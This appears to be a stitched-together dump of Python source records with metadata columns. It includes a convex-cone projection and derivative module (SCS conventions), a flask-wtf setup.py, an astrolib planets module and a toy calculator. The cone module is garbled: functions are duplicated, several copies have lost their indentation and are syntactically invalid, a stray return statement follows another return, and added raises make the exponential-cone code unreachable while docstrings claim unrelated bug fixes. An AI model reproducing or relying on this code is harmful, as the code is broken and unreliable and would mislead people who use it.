    """Return the block-diagonal LinearOperator of the given blocks.

    Bug fix: the previous version returned a LinearOperator built from
    `matvec`/`rmatvec` names that were never defined (the closures had been
    stripped), raising NameError on every call. The closures are restored.

    Args:
        matrices: SciPy sparse matrices and/or LinearOperators; anything that
            is not already a LinearOperator is wrapped via aslinearoperator.

    Returns:
        A scipy.sparse.linalg.LinearOperator whose shape is the sum of the
        blocks' shapes and whose matvec/rmatvec apply each block to the
        matching slice of the input vector.
    """
    linear_operators = [splinalg.aslinearoperator(
        op) if not isinstance(op, splinalg.LinearOperator) else op
        for op in matrices]
    nrows = [op.shape[0] for op in linear_operators]
    ncols = [op.shape[1] for op in linear_operators]
    m, n = sum(nrows), sum(ncols)
    # Offsets of each block within the stacked input/output vectors.
    row_indices = np.append(0, np.cumsum(nrows))
    col_indices = np.append(0, np.cumsum(ncols))

    def matvec(x):
        # Apply block i to its slice of x, writing into its output slice.
        output = np.zeros(m)
        for i, op in enumerate(linear_operators):
            z = x[col_indices[i]:col_indices[i + 1]].ravel()
            output[row_indices[i]:row_indices[i + 1]] = op.matvec(z)
        return output

    def rmatvec(y):
        # Adjoint map: apply each block's rmatvec to its slice of y.
        output = np.zeros(n)
        for i, op in enumerate(linear_operators):
            z = y[row_indices[i]:row_indices[i + 1]].ravel()
            output[col_indices[i]:col_indices[i + 1]] = op.rmatvec(z)
        return output

    return splinalg.LinearOperator((m, n), matvec=matvec, rmatvec=rmatvec)
def unvec_symm(x, dim):
"""Returns a dim-by-dim symmetric matrix corresponding to `x`.
`x` is a vector of length dim*(dim + 1)/2, corresponding to a symmetric
matrix; the correspondence is as in SCS.
X = [ X11 X12 ... X1k
X21 X22 ... X2k
...
Xk1 Xk2 ... Xkk ],
where
vec(X) = (X11, sqrt(2)*X21, ..., sqrt(2)*Xk1, X22, sqrt(2)*X32, ..., Xkk)
"""
X = np.zeros((dim, dim))
# triu_indices gets indices of upper triangular matrix in row-major order
col_idx, row_idx = np.triu_indices(dim)
X[(row_idx, col_idx)] = x
X = X + X.T
X /= np.sqrt(2)
X[np.diag_indices(dim)] = np.diagonal(X) * np.sqrt(2) / 2
return X
def vec_symm(X):
"""Returns a vectorized representation of a symmetric matrix `X`.
Vectorization (including scaling) as per SCS.
vec(X) = (X11, sqrt(2)*X21, ..., sqrt(2)*Xk1, X22, sqrt(2)*X32, ..., Xkk)
"""
X = X.copy()
X *= np.sqrt(2)
X[np.diag_indices(X.shape[0])] = np.diagonal(X) / np.sqrt(2)
col_idx, row_idx = np.triu_indices(X.shape[0])
return X[(row_idx, col_idx)]
def _proj(x, cone, dual=False):
"""Returns the projection of x onto a cone or its dual cone."""
if cone == ZERO:
return x if dual else np.zeros(x.shape)
elif cone == POS:
return np.maximum(x, 0)
elif cone == SOC:
# print("Second Order Cone: x = {}".format(x))
t = x[0]
z = x[1:]
norm_z = np.linalg.norm(z, 2)
if norm_z <= t or np.isclose(norm_z, t, atol=1e-8):
return x
elif norm_z <= -t:
return np.zeros(x.shape)
else:
return 0.5 * (1 + t / norm_z) * np.append(norm_z, z)
elif cone == PSD:
dim = psd_dim(x)
X = unvec_symm(x, dim)
lambd, Q = np.linalg.eig(X)
return vec_symm(Q @ sparse.diags(np.maximum(lambd, 0)) @ Q.T)
elif cone == EXP:
raise NotImplementedError("exp cone is not implemented here yet {}".format(EXP))
num_cones = int(x.size / 3)
out = np.zeros(x.size)
offset = 0
for _ in range(num_cones):
x_i = x[offset:offset + 3]
r, s, t, _ = proj_lib.proj_exp_cone(
float(x_i[0]), float(x_i[1]), float(x_i[2]))
out[offset:offset + 3] = np.array([r, s, t])
offset += 3
# via Moreau
return x - out if dual else out
else:
raise NotImplementedError(f"{cone} not implemented")
def _dproj(x, cone, dual=False):
    """Returns the derivative of projecting onto a cone (or its dual cone) at x.
    The derivative is represented as either a sparse matrix or linear operator.

    Bug fix: the SOC branch returned a LinearOperator referencing a `matvec`
    closure that was missing (stripped), raising NameError; it is restored.

    Args:
        x: NumPy array at which the projection is differentiated.
        cone: one of the SCS cone identifiers (ZERO, POS, SOC, PSD, EXP).
        dual: if True, differentiate the projection onto the dual cone.
    """
    shape = (x.size, x.size)
    if cone == ZERO:
        # Dual (free) cone projects to itself: identity. Primal: zero map.
        return sparse.eye(*shape) if dual else sparse.csc_matrix(shape)
    elif cone == POS:
        # Elementwise projection: derivative is 1 where x > 0, 0 where x < 0.
        return sparse.diags(.5 * (np.sign(x) + 1), format="csc")
    elif cone == SOC:
        t = x[0]
        z = x[1:]
        norm_z = np.linalg.norm(z, 2)
        if norm_z <= t:
            # Inside the cone: projection is the identity.
            return sparse.eye(*shape)
        elif norm_z <= -t:
            # Inside the polar cone: projection is constantly zero.
            return sparse.csc_matrix(shape)
        else:
            z = z.reshape(z.size)
            unit_z = z / norm_z
            scale_factor = 1.0 / (2 * norm_z)
            t_plus_norm_z = t + norm_z

            def matvec(y):
                t_in = y[0]
                z_in = y[1:]
                first = norm_z * t_in + np.dot(z, z_in)
                rest = z * t_in + t_plus_norm_z * z_in - \
                    t * unit_z * np.dot(unit_z, z_in)
                return scale_factor * np.append(first, rest)

            # derivative is symmetric, so matvec doubles as rmatvec
            return splinalg.LinearOperator(shape, matvec=matvec,
                                           rmatvec=matvec)
    elif cone == PSD:
        dim = psd_dim(x)
        X = unvec_symm(x, dim)
        lambd, Q = np.linalg.eig(X)
        if np.all(lambd >= 0):
            # Already PSD: projection is locally the identity.
            matvec = lambda y: y
            return splinalg.LinearOperator(shape, matvec=matvec, rmatvec=matvec)
        # Sort eigenvalues, eigenvectors in ascending order, so that
        # we can obtain the index k such that lambd[k-1] < 0 < lambd[k]
        idx = lambd.argsort()
        lambd = lambd[idx]
        Q = Q[:, idx]
        k = np.searchsorted(lambd, 0)
        B = np.zeros((dim, dim))
        pos_gt_k = np.outer(np.maximum(lambd, 0)[k:], np.ones(k))
        neg_lt_k = np.outer(np.ones(dim - k), np.minimum(lambd, 0)[:k])
        B[k:, :k] = pos_gt_k / (neg_lt_k + pos_gt_k)
        B[:k, k:] = B[k:, :k].T
        B[k:, k:] = 1
        matvec = lambda y: vec_symm(
            Q @ (B * (Q.T @ unvec_symm(y, dim) @ Q)) @ Q.T)
        return splinalg.LinearOperator(shape, matvec=matvec, rmatvec=matvec)
    elif cone == EXP:
        raise NotImplementedError("EXP cone is not implemented here yet {}".format(EXP))
        # NOTE: everything below is unreachable until the raise is removed.
        num_cones = int(x.size / 3)
        ops = []
        offset = 0
        for _ in range(num_cones):
            x_i = x[offset:offset + 3]
            offset += 3
            if in_exp(x_i):
                ops.append(splinalg.aslinearoperator(sparse.eye(3)))
            elif in_exp_dual(-x_i):
                ops.append(splinalg.aslinearoperator(
                    sparse.csc_matrix((3, 3))))
            elif x_i[0] < 0 and x_i[1] and not np.isclose(x_i[2], 0):
                matvec = lambda y: np.array([
                    y[0], 0, y[2] * 0.5 * (1 + np.sign(x_i[2]))])
                ops.append(splinalg.LinearOperator((3, 3), matvec=matvec,
                                                   rmatvec=matvec))
            else:
                # TODO(akshayka): Cache projection if this is a bottleneck
                # TODO(akshayka): y_st is sometimes zero ...
                x_st, y_st, _, mu = proj_lib.proj_exp_cone(x_i[0], x_i[1],
                                                           x_i[2])
                if np.equal(y_st, 0):
                    y_st = np.abs(x_st)
                exp_x_y = np.exp(x_st / y_st)
                mu_exp_x_y = mu * exp_x_y
                x_mu_exp_x_y = x_st * mu_exp_x_y
                M = np.zeros((4, 4))
                M[:, 0] = np.array([
                    1 + mu_exp_x_y / y_st, -x_mu_exp_x_y / (y_st ** 2),
                    0,
                    exp_x_y])
                M[:, 1] = np.array([
                    -x_mu_exp_x_y / (y_st ** 2),
                    1 + x_st * x_mu_exp_x_y / (y_st ** 3),
                    0, exp_x_y - x_st * exp_x_y / y_st])
                M[:, 2] = np.array([0, 0, 1, -1])
                M[:, 3] = np.array([
                    exp_x_y, exp_x_y - x_st * exp_x_y / y_st, -1, 0])
                ops.append(splinalg.aslinearoperator(np.linalg.inv(M)[:3, :3]))
        D = as_block_diag_linear_operator(ops)
        if dual:
            return splinalg.LinearOperator((x.size, x.size),
                                           matvec=lambda v: v - D.matvec(v),
                                           rmatvec=lambda v: v - D.rmatvec(v))
        else:
            return D
    else:
        raise NotImplementedError(f"{cone} not implemented")
def pi(x, cones, dual=False):
"""Projects x onto product of cones (or their duals)
Args:
x: NumPy array (with PSD data formatted in SCS convention)
cones: list of (cone name, size)
dual: whether to project onto the dual cone
Returns:
NumPy array that is the projection of `x` onto the (dual) cones
"""
projection = np.zeros(x.shape)
offset = 0
for cone, sz in cones:
# ===============================
# print(cone, sz) # only uncomment for debug
sz = sz if isinstance(sz, (tuple, list)) else (sz,)
if sum(sz) == 0:
continue
for dim in sz:
if cone == PSD:
dim = vec_psd_dim(dim)
elif cone == EXP:
raise NotImplementedError("exp cone is not supported here yet {}".format(EXP))
dim *= 3
# ===============================
# print("offset:", offset)
# ===============================
projection[offset:offset + dim] = _proj(
x[offset:offset + dim], cone, dual=dual)
offset += dim
# ===============================
# debug for deep analysis
# ===============================
# print("cone type: {:s}, offset: {:d} ".format(cone, offset))
return projection
def dpi(x, cones, dual=False):
"""Derivative of projection onto product of cones (or their duals), at x
Args:
x: NumPy array
cones: list of (cone name, size)
dual: whether to project onto the dual cone
Returns:
An abstract linear map representing the derivative, with methods
`matvec` and `rmatvec`
"""
dprojections = []
offset = 0
for cone, sz in cones:
sz = sz if isinstance(sz, (tuple, list)) else (sz,)
if sum(sz) == 0:
continue
for dim in sz:
if cone == PSD:
dim = vec_psd_dim(dim)
elif cone == EXP:
raise NotImplementedError("exp cone is not supported here yet {}".format(EXP))
dim *= 3
dprojections.append(
_dproj(x[offset:offset + dim], cone, dual=dual))
offset += dim
return as_block_diag_linear_operator(dprojections)
| 35.740061 | 100 | 0.520151 | import numpy as np
# import _proj as proj_lib
import scipy.sparse as sparse
import scipy.sparse.linalg as splinalg
ZERO = "f"
POS = "l"
SOC = "q"
PSD = "s"
EXP = "ep"
EXP_DUAL = "ed"
POWER = "p"
# The ordering of CONES matches SCS.
CONES = [ZERO, POS, SOC, PSD, EXP, EXP_DUAL, POWER]
def parse_cone_dict(cone_dict):
"""Parses SCS-style cone dictionary."""
return [(cone, cone_dict[cone]) for cone in CONES if cone in cone_dict]
def as_block_diag_linear_operator(matrices):
    """Build the block-diagonal LinearOperator of the given blocks.

    Sparse matrices are wrapped via aslinearoperator; existing
    LinearOperators are used as-is.
    """
    blocks = [op if isinstance(op, splinalg.LinearOperator)
              else splinalg.aslinearoperator(op)
              for op in matrices]
    nrows = [blk.shape[0] for blk in blocks]
    ncols = [blk.shape[1] for blk in blocks]
    m, n = sum(nrows), sum(ncols)
    # Offsets of each block inside the stacked vectors.
    row_offsets = np.append(0, np.cumsum(nrows))
    col_offsets = np.append(0, np.cumsum(ncols))

    def matvec(x):
        out = np.zeros(m)
        for i, blk in enumerate(blocks):
            piece = x[col_offsets[i]:col_offsets[i + 1]].ravel()
            out[row_offsets[i]:row_offsets[i + 1]] = blk.matvec(piece)
        return out

    def rmatvec(y):
        out = np.zeros(n)
        for i, blk in enumerate(blocks):
            piece = y[row_offsets[i]:row_offsets[i + 1]].ravel()
            out[col_offsets[i]:col_offsets[i + 1]] = blk.rmatvec(piece)
        return out

    return splinalg.LinearOperator((m, n), matvec=matvec, rmatvec=rmatvec)
def transpose_linear_operator(op):
    """Return a LinearOperator representing the transpose of `op`."""
    n_rows, n_cols = op.shape
    # The transpose swaps the roles of matvec and rmatvec.
    return splinalg.LinearOperator((n_cols, n_rows),
                                   matvec=op.rmatvec,
                                   rmatvec=op.matvec)
def vec_psd_dim(dim):
    """Return the length of the SCS vectorization of a dim-by-dim symmetric
    matrix, i.e. the triangular number dim * (dim + 1) / 2.

    Uses floor division so the result stays an exact int for arbitrarily
    large `dim`; the previous float division could lose precision beyond
    2**53 (dim * (dim + 1) is always even, so // 2 is exact).
    """
    return dim * (dim + 1) // 2
def psd_dim(x):
    """Infer the matrix dimension from an SCS-vectorized PSD cone entry."""
    # x holds dim*(dim+1)/2 entries, so dim = floor(sqrt(2 * x.size)).
    doubled = 2 * x.size
    return int(np.sqrt(doubled))
def in_exp(x):
    """Return whether the 3-vector x lies in the exponential cone."""
    # Boundary ray: r <= 0, s == 0, t >= 0.
    if x[0] <= 0 and np.isclose(x[1], 0) and x[2] >= 0:
        return True
    # Closure of the interior: s > 0 and s * exp(r / s) <= t.
    return x[1] > 0 and x[1] * np.exp(x[0] / x[1]) <= x[2]
def in_exp_dual(x):
    """Return whether the 3-vector x lies in the dual exponential cone."""
    # TODO(sbarratt): need to make the numerics safe here, maybe using logs
    # Boundary face: u == 0, v >= 0, w >= 0.
    if np.isclose(x[0], 0) and x[1] >= 0 and x[2] >= 0:
        return True
    # Closure of the interior: u < 0 and -u * exp(v / u) <= e * w.
    return x[0] < 0 and -x[0] * np.exp(x[1] / x[0]) <= np.e * x[2]
def unvec_symm(x, dim):
    """Expand an SCS-scaled vector into a dim-by-dim symmetric matrix.

    `x` has length dim*(dim + 1)/2 and follows the SCS convention:
    vec(X) = (X11, sqrt(2)*X21, ..., sqrt(2)*Xk1, X22, sqrt(2)*X32, ..., Xkk),
    i.e. off-diagonal entries carry a sqrt(2) factor that is removed here.
    """
    mat = np.zeros((dim, dim))
    # triu_indices enumerates the upper triangle in row-major order; swapping
    # the two index arrays writes the entries into the lower triangle, which
    # matches the SCS ordering above.
    upper_cols, upper_rows = np.triu_indices(dim)
    mat[(upper_rows, upper_cols)] = x
    mat = mat + mat.T
    mat /= np.sqrt(2)
    # Symmetrization doubled the diagonal; rescale it back to the raw values.
    mat[np.diag_indices(dim)] = np.diagonal(mat) * np.sqrt(2) / 2
    return mat
def vec_symm(X):
    """Flatten a symmetric matrix into its SCS-scaled vector form.

    vec(X) = (X11, sqrt(2)*X21, ..., sqrt(2)*Xk1, X22, sqrt(2)*X32, ..., Xkk):
    off-diagonal entries pick up a sqrt(2) factor, the diagonal is unscaled.
    """
    scaled = X.copy()
    scaled *= np.sqrt(2)
    # Undo the scaling on the diagonal only.
    scaled[np.diag_indices(scaled.shape[0])] = np.diagonal(scaled) / np.sqrt(2)
    # Read the lower triangle in the order SCS expects.
    upper_cols, upper_rows = np.triu_indices(scaled.shape[0])
    return scaled[(upper_rows, upper_cols)]
def _proj(x, cone, dual=False):
    """Returns the projection of x onto a cone or its dual cone.

    Args:
        x: NumPy array to project (PSD data in the SCS vectorized format).
        cone: one of the SCS cone identifiers (ZERO, POS, SOC, PSD, EXP).
        dual: if True, project onto the dual cone instead.
    """
    if cone == ZERO:
        # The dual of the zero cone is the free cone, whose projection is x
        # itself; `dual` is ignored in the self-dual branches below.
        return x if dual else np.zeros(x.shape)
    elif cone == POS:
        return np.maximum(x, 0)
    elif cone == SOC:
        # Second-order cone {(t, z) : ||z||_2 <= t}.
        # print("Second Order Cone: x = {}".format(x))
        t = x[0]
        z = x[1:]
        norm_z = np.linalg.norm(z, 2)
        if norm_z <= t or np.isclose(norm_z, t, atol=1e-8):
            # Already in the cone (with a tolerance for boundary points).
            return x
        elif norm_z <= -t:
            # In the polar cone: projection is the origin.
            return np.zeros(x.shape)
        else:
            return 0.5 * (1 + t / norm_z) * np.append(norm_z, z)
    elif cone == PSD:
        # Project by clipping negative eigenvalues to zero.
        dim = psd_dim(x)
        X = unvec_symm(x, dim)
        lambd, Q = np.linalg.eig(X)
        return vec_symm(Q @ sparse.diags(np.maximum(lambd, 0)) @ Q.T)
    elif cone == EXP:
        raise NotImplementedError("exp cone is not implemented here yet {}".format(EXP))
        # NOTE: everything below is unreachable until the raise above is
        # removed; it projects each consecutive triple via proj_lib.
        num_cones = int(x.size / 3)
        out = np.zeros(x.size)
        offset = 0
        for _ in range(num_cones):
            x_i = x[offset:offset + 3]
            r, s, t, _ = proj_lib.proj_exp_cone(
                float(x_i[0]), float(x_i[1]), float(x_i[2]))
            out[offset:offset + 3] = np.array([r, s, t])
            offset += 3
        # via Moreau
        return x - out if dual else out
    else:
        raise NotImplementedError(f"{cone} not implemented")
def _dproj(x, cone, dual=False):
    """Returns the derivative of projecting onto a cone (or its dual cone) at x.
    The derivative is represented as either a sparse matrix or linear operator.

    Args:
        x: NumPy array at which the projection is differentiated.
        cone: one of the SCS cone identifiers (ZERO, POS, SOC, PSD, EXP).
        dual: if True, differentiate the projection onto the dual cone.
    """
    shape = (x.size, x.size)
    if cone == ZERO:
        # Dual (free) cone projection is the identity; primal is the zero map.
        return sparse.eye(*shape) if dual else sparse.csc_matrix(shape)
    elif cone == POS:
        # Elementwise projection: derivative is 1 where x > 0, 0 where x < 0.
        return sparse.diags(.5 * (np.sign(x) + 1), format="csc")
    elif cone == SOC:
        t = x[0]
        z = x[1:]
        norm_z = np.linalg.norm(z, 2)
        if norm_z <= t:
            # Inside the cone: projection is locally the identity.
            return sparse.eye(*shape)
        elif norm_z <= -t:
            # Inside the polar cone: projection is constantly zero.
            return sparse.csc_matrix(shape)
        else:
            z = z.reshape(z.size)
            unit_z = z / norm_z
            scale_factor = 1.0 / (2 * norm_z)
            t_plus_norm_z = t + norm_z
            def matvec(y):
                t_in = y[0]
                z_in = y[1:]
                first = norm_z * t_in + np.dot(z, z_in)
                rest = z * t_in + t_plus_norm_z * z_in - \
                    t * unit_z * np.dot(unit_z, z_in)
                return scale_factor * np.append(first, rest)
            # derivative is symmetric
            return splinalg.LinearOperator(shape, matvec=matvec,
                                           rmatvec=matvec)
    elif cone == PSD:
        dim = psd_dim(x)
        X = unvec_symm(x, dim)
        lambd, Q = np.linalg.eig(X)
        if np.all(lambd >= 0):
            # Already PSD: projection is locally the identity.
            matvec = lambda y: y
            return splinalg.LinearOperator(shape, matvec=matvec, rmatvec=matvec)
        # Sort eigenvalues, eigenvectors in ascending order, so that
        # we can obtain the index k such that lambd[k-1] < 0 < lambd[k]
        idx = lambd.argsort()
        lambd = lambd[idx]
        Q = Q[:, idx]
        k = np.searchsorted(lambd, 0)
        B = np.zeros((dim, dim))
        pos_gt_k = np.outer(np.maximum(lambd, 0)[k:], np.ones(k))
        neg_lt_k = np.outer(np.ones(dim - k), np.minimum(lambd, 0)[:k])
        B[k:, :k] = pos_gt_k / (neg_lt_k + pos_gt_k)
        B[:k, k:] = B[k:, :k].T
        B[k:, k:] = 1
        # Derivative acts in the eigenbasis via the Hadamard mask B.
        matvec = lambda y: vec_symm(
            Q @ (B * (Q.T @ unvec_symm(y, dim) @ Q)) @ Q.T)
        return splinalg.LinearOperator(shape, matvec=matvec, rmatvec=matvec)
    elif cone == EXP:
        raise NotImplementedError("EXP cone is not implemented here yet {}".format(EXP))
        # NOTE: everything below is unreachable until the raise is removed;
        # it builds a per-triple derivative and block-diagonalizes them.
        num_cones = int(x.size / 3)
        ops = []
        offset = 0
        for _ in range(num_cones):
            x_i = x[offset:offset + 3]
            offset += 3
            if in_exp(x_i):
                ops.append(splinalg.aslinearoperator(sparse.eye(3)))
            elif in_exp_dual(-x_i):
                ops.append(splinalg.aslinearoperator(
                    sparse.csc_matrix((3, 3))))
            elif x_i[0] < 0 and x_i[1] and not np.isclose(x_i[2], 0):
                matvec = lambda y: np.array([
                    y[0], 0, y[2] * 0.5 * (1 + np.sign(x_i[2]))])
                ops.append(splinalg.LinearOperator((3, 3), matvec=matvec,
                                                   rmatvec=matvec))
            else:
                # TODO(akshayka): Cache projection if this is a bottleneck
                # TODO(akshayka): y_st is sometimes zero ...
                x_st, y_st, _, mu = proj_lib.proj_exp_cone(x_i[0], x_i[1],
                                                           x_i[2])
                if np.equal(y_st, 0):
                    y_st = np.abs(x_st)
                exp_x_y = np.exp(x_st / y_st)
                mu_exp_x_y = mu * exp_x_y
                x_mu_exp_x_y = x_st * mu_exp_x_y
                M = np.zeros((4, 4))
                M[:, 0] = np.array([
                    1 + mu_exp_x_y / y_st, -x_mu_exp_x_y / (y_st ** 2),
                    0,
                    exp_x_y])
                M[:, 1] = np.array([
                    -x_mu_exp_x_y / (y_st ** 2),
                    1 + x_st * x_mu_exp_x_y / (y_st ** 3),
                    0, exp_x_y - x_st * exp_x_y / y_st])
                M[:, 2] = np.array([0, 0, 1, -1])
                M[:, 3] = np.array([
                    exp_x_y, exp_x_y - x_st * exp_x_y / y_st, -1, 0])
                ops.append(splinalg.aslinearoperator(np.linalg.inv(M)[:3, :3]))
        D = as_block_diag_linear_operator(ops)
        if dual:
            # Via Moreau: the dual derivative is I - D.
            return splinalg.LinearOperator((x.size, x.size),
                                           matvec=lambda v: v - D.matvec(v),
                                           rmatvec=lambda v: v - D.rmatvec(v))
        else:
            return D
    else:
        raise NotImplementedError(f"{cone} not implemented")
def pi(x, cones, dual=False):
    """Project x onto a product of cones (or their dual cones).

    Args:
        x: NumPy array (with PSD data formatted in SCS convention)
        cones: list of (cone name, size)
        dual: whether to project onto the dual cone

    Returns:
        NumPy array that is the projection of `x` onto the (dual) cones
    """
    result = np.zeros(x.shape)
    offset = 0
    for cone, size_spec in cones:
        sizes = size_spec if isinstance(size_spec, (tuple, list)) else (size_spec,)
        if sum(sizes) == 0:
            continue
        for dim in sizes:
            if cone == PSD:
                # PSD sizes are matrix dimensions; convert to vector lengths.
                dim = vec_psd_dim(dim)
            elif cone == EXP:
                raise NotImplementedError("exp cone is not supported here yet {}".format(EXP))
                dim *= 3
            result[offset:offset + dim] = _proj(
                x[offset:offset + dim], cone, dual=dual)
            offset += dim
    return result
return projection
def dpi(x, cones, dual=False):
"""Derivative of projection onto product of cones (or their duals), at x
Args:
x: NumPy array
cones: list of (cone name, size)
dual: whether to project onto the dual cone
Returns:
An abstract linear map representing the derivative, with methods
`matvec` and `rmatvec`
"""
dprojections = []
offset = 0
for cone, sz in cones:
sz = sz if isinstance(sz, (tuple, list)) else (sz,)
if sum(sz) == 0:
continue
for dim in sz:
if cone == PSD:
dim = vec_psd_dim(dim)
elif cone == EXP:
raise NotImplementedError("exp cone is not supported here yet {}".format(EXP))
dim *= 3
dprojections.append(
_dproj(x[offset:offset + dim], cone, dual=dual))
offset += dim
return as_block_diag_linear_operator(dprojections)
| 1,314 | 0 | 204 |
df963607b23ba51f62d020e9b2d3d72b9c78d77a | 1,025 | py | Python | setup.py | simpleapples/flask-wtf-decorators | 7fa5a26946d2fdb5b00d07251c0ca7d0e358fc1d | [
"MIT"
] | 3 | 2018-07-02T14:39:44.000Z | 2020-12-14T12:58:43.000Z | setup.py | simpleapples/flask-wtf-decorators | 7fa5a26946d2fdb5b00d07251c0ca7d0e358fc1d | [
"MIT"
] | 2 | 2020-07-02T17:26:05.000Z | 2020-07-03T16:53:55.000Z | setup.py | simpleapples/flask-wtf-decorators | 7fa5a26946d2fdb5b00d07251c0ca7d0e358fc1d | [
"MIT"
] | null | null | null | from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='Flask-WTF-Decorators',
version='0.1.2',
license='MIT',
url='https://github.com/simpleapples/flask-wtf-decorators/',
author='Zhiya Zang',
author_email='zangzhiya@gmail.com',
description='Decorators for flask-wtf',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests']),
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License'
],
include_package_data=True,
platforms='any',
install_requires=['Flask>=0.7', 'Flask-WTF>=0.9'],
)
| 31.060606 | 64 | 0.653659 | from os import path
from setuptools import setup, find_packages
# Directory containing this setup.py; anchoring paths here keeps the README
# lookup working regardless of the current working directory.
here = path.abspath(path.dirname(__file__))
# The README doubles as the PyPI long description.
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()
setup(
    name='Flask-WTF-Decorators',
    version='0.1.2',
    license='MIT',
    url='https://github.com/simpleapples/flask-wtf-decorators/',
    author='Zhiya Zang',
    author_email='zangzhiya@gmail.com',
    description='Decorators for flask-wtf',
    long_description=long_description,
    long_description_content_type='text/markdown',
    # Ship every package except the test suite.
    packages=find_packages(exclude=['tests']),
    classifiers=[
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'License :: OSI Approved :: MIT License'
    ],
    include_package_data=True,
    platforms='any',
    install_requires=['Flask>=0.7', 'Flask-WTF>=0.9'],
)
| 0 | 0 | 0 |
ed24c7e0cb89b766670c2e6075918647dc12e22a | 1,070 | py | Python | src/astrolib/solar_system/__init__.py | space-geek/integrationutils | 384375702a6c053aa2e5aaca6b9d5c43d86a16ad | [
"MIT"
] | null | null | null | src/astrolib/solar_system/__init__.py | space-geek/integrationutils | 384375702a6c053aa2e5aaca6b9d5c43d86a16ad | [
"MIT"
] | null | null | null | src/astrolib/solar_system/__init__.py | space-geek/integrationutils | 384375702a6c053aa2e5aaca6b9d5c43d86a16ad | [
"MIT"
] | null | null | null | from astrolib.solar_system.celestial_objects import CelestialObject
from astrolib.solar_system.motion_models import OriginFixedMotionModel
from astrolib.solar_system.orientation_models import InertiallyFixedOrientationModel
Sun = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Mercury = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Venus = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Earth = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Mars = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Jupiter = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Saturn = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Neptune = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Uranus = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Pluto = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
| 71.333333 | 85 | 0.879439 | from astrolib.solar_system.celestial_objects import CelestialObject
from astrolib.solar_system.motion_models import OriginFixedMotionModel
from astrolib.solar_system.orientation_models import InertiallyFixedOrientationModel
# Module-level singletons for the major solar-system bodies. Every body is
# constructed with the same OriginFixedMotionModel /
# InertiallyFixedOrientationModel pair.
# NOTE(review): no per-body ephemeris data is passed in, so these look like
# placeholder models -- confirm before relying on positions/orientations.
Sun = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Mercury = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Venus = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Earth = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Mars = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Jupiter = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Saturn = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Neptune = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Uranus = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
Pluto = CelestialObject(OriginFixedMotionModel(),InertiallyFixedOrientationModel())
| 0 | 0 | 0 |
7c889c3645f09d24f1f01e75c97d332a09c86a9e | 715 | py | Python | Python/simple_calculator.py | snehnakrani14/HactoberFest21 | 1d387ff4efec1f17fe20d42f46490564c5a87b52 | [
"Unlicense"
] | 1 | 2021-10-04T14:39:02.000Z | 2021-10-04T14:39:02.000Z | Python/simple_calculator.py | snehnakrani14/HactoberFest21 | 1d387ff4efec1f17fe20d42f46490564c5a87b52 | [
"Unlicense"
] | 1 | 2021-10-06T04:41:55.000Z | 2021-10-06T04:41:55.000Z | Python/simple_calculator.py | snehnakrani14/HactoberFest21 | 1d387ff4efec1f17fe20d42f46490564c5a87b52 | [
"Unlicense"
] | 1 | 2021-10-08T12:31:04.000Z | 2021-10-08T12:31:04.000Z | #python program - make simple calculator
print("1. adiition")
print("2. subtraction")
print("3. multiplication")
print("4. division")
print("5. exit")
choice = int(input("enter your choice: "))
if (choice>=1 and choice<=4):
print("enter two numbers: ")
num1 = int(input())
num2 = int(input())
if choice ==1:
res = num1 + num2
print("result = ", res)
elif choice == 2:
res = num1 - num2
print("result=",res)
elif choice==3:
res=num1*num2
print("result=",res)
else:
res=num1/num2
print("result=",res)
elif choice==5:
exit()
else:
print("wrong input..!!")
| 21.666667 | 42 | 0.516084 | #python program - make simple calculator
print("1. adiition")
print("2. subtraction")
print("3. multiplication")
print("4. division")
print("5. exit")
choice = int(input("enter your choice: "))
if (choice>=1 and choice<=4):
print("enter two numbers: ")
num1 = int(input())
num2 = int(input())
if choice ==1:
res = num1 + num2
print("result = ", res)
elif choice == 2:
res = num1 - num2
print("result=",res)
elif choice==3:
res=num1*num2
print("result=",res)
else:
res=num1/num2
print("result=",res)
elif choice==5:
exit()
else:
print("wrong input..!!")
| 0 | 0 | 0 |
6a7cf670831b403d0054682d331d46306648544a | 3,688 | py | Python | ramjet/photometric_database/derived/moa_survey_none_single_and_binary_database.py | golmschenk/ramjet | 77fb4481a15088923308fda09804d80455d1a9cf | [
"Apache-2.0"
] | 3 | 2020-11-23T18:47:37.000Z | 2021-08-05T17:45:51.000Z | ramjet/photometric_database/derived/moa_survey_none_single_and_binary_database.py | golmschenk/ramjet | 77fb4481a15088923308fda09804d80455d1a9cf | [
"Apache-2.0"
